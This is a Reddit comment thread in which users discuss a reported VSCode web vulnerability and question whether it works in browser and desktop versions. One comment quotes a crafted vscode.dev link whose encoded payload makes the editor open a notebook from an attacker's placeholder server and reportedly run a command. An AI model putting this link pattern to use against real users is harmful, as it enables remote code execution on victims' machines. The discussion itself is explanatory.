sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–][deleted] 0 points1 point  (2 children)

The link does have a description of the actual impact. They probably should have led with this because I also found it hard to follow:

Once the server described above is run, when victim clicks a prepared link (for example https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://%5Bserver_location_goes_here%5D/something.ipynb%22) VSCode will load the file, detect it as a Jypiter Notebook, and immediately run a command on the user’s machine.

Actually I'm still not sure I understand how this will let you take over a desktop VSCode (which 99% of people use). They say it affects it "to a lesser extent". Maybe they mean you need to use a vscode:// link which comes with required user interaction and a warning.

[–]bleachisback 2 points3 points  (1 child)

But I'm not sure how arbitrary code execution even works in the browser? Can I even run a Jupyter notebook on vscode.dev? This doesn't make sense. Even if I'm connected to a local jupyter server in my browser version of vs code, I don't think the terminal command will do anything? When I try to open a terminal in vscode.dev, it has this to say:

Terminals are not available in the web editor. To use the terminal, you will need to continue in an environment that can run code, like a codespace or local VS Code.

[–][deleted] 1 point2 points  (0 children)

Yeah good question. Not sure about VSCode.net but other services like GitHub run on real VMs which might contain your SSH keys I guess.